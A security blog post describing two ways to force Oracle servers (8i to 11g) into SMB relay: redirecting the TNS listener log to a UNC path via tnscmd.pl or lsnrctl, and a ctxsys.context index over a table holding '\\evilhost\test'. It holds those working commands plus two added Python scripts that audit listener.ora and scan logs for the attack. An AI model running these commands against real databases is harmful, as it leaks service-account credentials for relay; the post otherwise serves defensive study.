
SMBRelay bible 3. SMBRelay by Oracle

As in the previous post, we'll talk about methods which need only non-privileged rights, because there are too many ways to do SMB relay with privileged accounts, and which of them works depends on the current situation and on our rights.

Intro

Our next target is Oracle. Oracle is one of the most widespread RDBMSs and many enterprises use it as a backend. Versions from 8i to 11g can be found in real life, and the information below applies to each of them.

Runs as…

The Oracle server service runs as 'System' by default. But, as with MS SQL, it very often happens that the service runs as a domain or local user account for various reasons, for example when it is used as the backend for SAP and other ERP systems.

Attack!!!

There are two ways to carry out the SMB relay attack. One of them doesn't need any privilege; the other needs the CONNECT and RESOURCE roles, which almost any user has.

1st method – TNS listener set_log.

"The Transparent Network Substrate (TNS) listener is a service which establishes and maintains connections with Oracle database services. When it receives a request from a client, the TNS listener establishes a connection between the client and server over a transparent network substrate, which allows communication regardless of the network protocol being used by either system."

We can use this method when we are able to connect remotely to the TNS listener.

Before 10g, the TNS listener is not protected by a password or by the 'ADMIN_RESTRICTIONS' option by default. We use the 'set_log' command for SMB relay.

The 'set_log' command sets the path to the TNS listener's log file. We can use either the original Oracle tool, 'lsnrctl', or a Perl script, 'tnscmd', to exploit this weakness.

Example with Perl script:

./tnscmd.pl -h victim.com --rawcmd "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=\\evilhost\test)))"

Example with LSNRCTL:

LSNRCTL>set log_file \\evilhost\test

The next connection to the TNS listener produces the UNC request needed for SMB relay.
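From the defender's side, the same facts translate into a configuration check: a listener alias without ADMIN_RESTRICTIONS_<alias> = ON (and, before 10g, without a PASSWORDS_<alias> entry) still honours a remote 'set log_file'. The script below is an added example written for this post, not the author's code or an Oracle tool. It audits listener.ora text for those settings and for a log or trace location that is already a UNC path; the two listener.ora fragments are constructed sample data, and the 'pre_10g' switch is an assumption of this example, standing in for knowing which listener version is in use.

```python
import re

# Constructed listener.ora fragments (example data, not from the original post):
# a file with no administrative restrictions, and the same file with the
# settings that stop a remote client from changing the log path.
WEAK_LISTENER_ORA = """
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = dbhost.example.test)(PORT = 1521))
    )
  )
LOG_FILE_LISTENER = listener.log
"""

HARDENED_LISTENER_ORA = """
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = dbhost.example.test)(PORT = 1521))
    )
  )
ADMIN_RESTRICTIONS_LISTENER = ON
LOCAL_OS_AUTHENTICATION_LISTENER = ON
LOG_FILE_LISTENER = listener.log
"""

# A listener alias is an unindented NAME = whose value is a parenthesised address list.
ALIAS_RE = re.compile(r"^([A-Za-z][A-Za-z0-9_]*)\s*=\s*(?:\(.*)?$", re.MULTILINE)
# One-line parameters such as ADMIN_RESTRICTIONS_LISTENER = ON.
PARAM_RE = re.compile(r"^([A-Za-z][A-Za-z0-9_]*)\s*=\s*([^\s(]\S*)\s*$", re.MULTILINE)
# \\host\share style path: writing the listener log there makes the service
# account open an SMB connection to that host.
UNC_RE = re.compile(r"\\\\[A-Za-z0-9._-]+\\[^\s'\")]+")


def parse_listener_ora(text):
    """Return (listener aliases, {PARAM: value}) from listener.ora text."""
    aliases = [m.group(1).upper() for m in ALIAS_RE.finditer(text)
               if not m.group(1).upper().startswith("SID_LIST_")]
    params = {m.group(1).upper(): m.group(2) for m in PARAM_RE.finditer(text)}
    return aliases, params


def audit_listener_ora(text, pre_10g=False):
    """List the reasons a listener would honour a remote 'set log_file'.

    pre_10g=True applies the 8i/9i model, where PASSWORDS_<alias> and
    ADMIN_RESTRICTIONS_<alias> are the only controls on SET commands.
    On 10g and later the listener defaults to local OS authentication, so the
    check is that it was not switched off and that ADMIN_RESTRICTIONS is on too.
    """
    aliases, params = parse_listener_ora(text)
    findings = []
    for alias in aliases:
        if params.get(f"ADMIN_RESTRICTIONS_{alias}", "").upper() != "ON":
            findings.append(f"{alias}: ADMIN_RESTRICTIONS_{alias} is not ON, so runtime SET "
                            f"commands (including set log_file) are accepted")
        if pre_10g and f"PASSWORDS_{alias}" not in params:
            findings.append(f"{alias}: no PASSWORDS_{alias} entry, so administrative "
                            f"commands need no password")
        if not pre_10g and params.get(f"LOCAL_OS_AUTHENTICATION_{alias}", "ON").upper() != "ON":
            findings.append(f"{alias}: LOCAL_OS_AUTHENTICATION_{alias} is OFF, so remote "
                            f"administration is possible again")
        # A log or trace location that is already a UNC path is the finished attack.
        for key in (f"LOG_FILE_{alias}", f"LOG_DIRECTORY_{alias}", f"TRACE_DIRECTORY_{alias}"):
            value = params.get(key, "")
            if UNC_RE.search(value):
                findings.append(f"{alias}: {key} is the UNC path {value}; the listener "
                                f"opens it over SMB as its service account")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_LISTENER_ORA), ("hardened", HARDENED_LISTENER_ORA)):
        print(label, audit_listener_ora(text, pre_10g=True) or ["no findings"])
```

Run against a real listener.ora, the weak fragment yields one finding on 10g+ (no ADMIN_RESTRICTIONS) and two on 8i/9i (no password either), while the hardened fragment is clean on 10g+; on a pre-10g listener it still reports the missing PASSWORDS_LISTENER entry, which is set through lsnrctl rather than typed into the file.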

2nd method – ctxsys.context.

This method needs only the 'CONNECT' and 'RESOURCE' roles, which almost all users have, so you need at least one real user in the RDBMS. We use index creation with ctxsys.context to force a UNC path request to our host.

There are three steps:

1) Create a special table:

SQL> CREATE TABLE files (id NUMBER PRIMARY KEY, path VARCHAR(255) UNIQUE, ot_format VARCHAR(6));

2) Insert the network path into the new table:

SQL> INSERT INTO files VALUES (1, '\\evilhost\test', NULL);

3) Create ctxsys.context index on path column:

SQL> CREATE INDEX file_index ON files(path) INDEXTYPE IS ctxsys.context PARAMETERS ('datastore ctxsys.file_datastore format column ot_format');

And the SMB relay succeeds.

A full description of this method can be found in "Penetration from application down to OS (Oracle database)".
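Both methods leave traces that a defender can search for: the first in listener.log, where each control command is recorded together with its connect descriptor, and the second in the database audit trail, where the INSERT of a UNC literal and the CREATE INDEX with ctxsys.file_datastore appear as statement text. The script below is an added example written for this post (not the author's code or an Oracle tool) that scans both sources. The listener.log lines and audit statements are constructed sample data; the "<timestamp> * <connect data> * <command> * <return code>" layout of the log lines and the exact audit-trail columns are assumptions of this example.

```python
import re

# Constructed sample records (not from the original post). The listener.log lines
# follow the assumed "<timestamp> * <connect data> * <command> * <return code>"
# layout; the SQL strings stand in for statement text from the audit trail.
LISTENER_LOG = r"""
14-MAY-2010 12:00:41 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=svc_app))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.15)(PORT=51022)) * establish * ORCL * 0
14-MAY-2010 12:01:03 * (CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=status)(ARGUMENTS=64)(SERVICE=LISTENER)(VERSION=1)) * status * 0
14-MAY-2010 12:01:09 * (CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=\\evilhost\test)) * log_file * 0
"""

AUDIT_SQL = [
    "SELECT id, path FROM files WHERE id = 1",
    r"INSERT INTO files VALUES (1, '\\evilhost\test', NULL)",
    "CREATE INDEX file_index ON files(path) INDEXTYPE IS ctxsys.context "
    "PARAMETERS ('datastore ctxsys.file_datastore format column ot_format')",
]

UNC_RE = re.compile(r"\\\\[A-Za-z0-9._-]+\\[^\s'\")]+")
# Listener SET commands that change where the listener writes files.
PATH_SET_COMMANDS = {"log_file", "log_directory", "trc_file", "trc_directory"}
COMMAND_RE = re.compile(r"\(COMMAND=([a-z_]+)\)")
VALUE_RE = re.compile(r"\(VALUE=([^)]*)\)")
# Text datastores that make the database process open paths taken from table rows.
FILE_DATASTORE_RE = re.compile(r"ctxsys\.(file|url)_datastore", re.IGNORECASE)


def scan_listener_log(text):
    """Return (severity, reason, line) tuples for control commands in listener.log."""
    hits = []
    for line in text.splitlines():
        cmd = COMMAND_RE.search(line)
        if not cmd:
            continue  # ordinary 'establish' entries carry no COMMAND
        command = cmd.group(1)
        value = VALUE_RE.search(line)
        value = value.group(1) if value else ""
        if command in PATH_SET_COMMANDS and UNC_RE.search(value):
            hits.append(("high", f"{command} redirected to UNC path {value}", line))
        elif command in PATH_SET_COMMANDS:
            hits.append(("medium", f"{command} changed at runtime to {value}", line))
        else:
            hits.append(("low", f"listener control command {command}", line))
    return hits


def scan_audit_sql(statements):
    """Return (severity, reason, statement) tuples for statements that can make
    the database process open a UNC path."""
    hits = []
    for stmt in statements:
        datastore = FILE_DATASTORE_RE.search(stmt)
        unc = UNC_RE.search(stmt)
        if datastore:
            hits.append(("high", f"CONTEXT index using {datastore.group(0)}", stmt))
        elif unc:
            hits.append(("medium", f"UNC path literal {unc.group(0)} in SQL text", stmt))
    return hits


if __name__ == "__main__":
    for sev, reason, _ in scan_listener_log(LISTENER_LOG) + scan_audit_sql(AUDIT_SQL):
        print(f"[{sev}] {reason}")
```

On the sample data the 'status' command is reported at low severity, the 'log_file' command with a UNC value at high, the INSERT of the UNC literal at medium and the file_datastore index at high; a UNC literal on its own is only suspicious, whereas a file_datastore index on a column that holds one is the complete chain from method 2.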

The table below shows which method can be used with each version.

Table 1

Method            8i    9i    10g   11g   User needed
set log file      OK    OK    NO    NO    NO
ctxsys.context    OK    OK    OK    OK    YES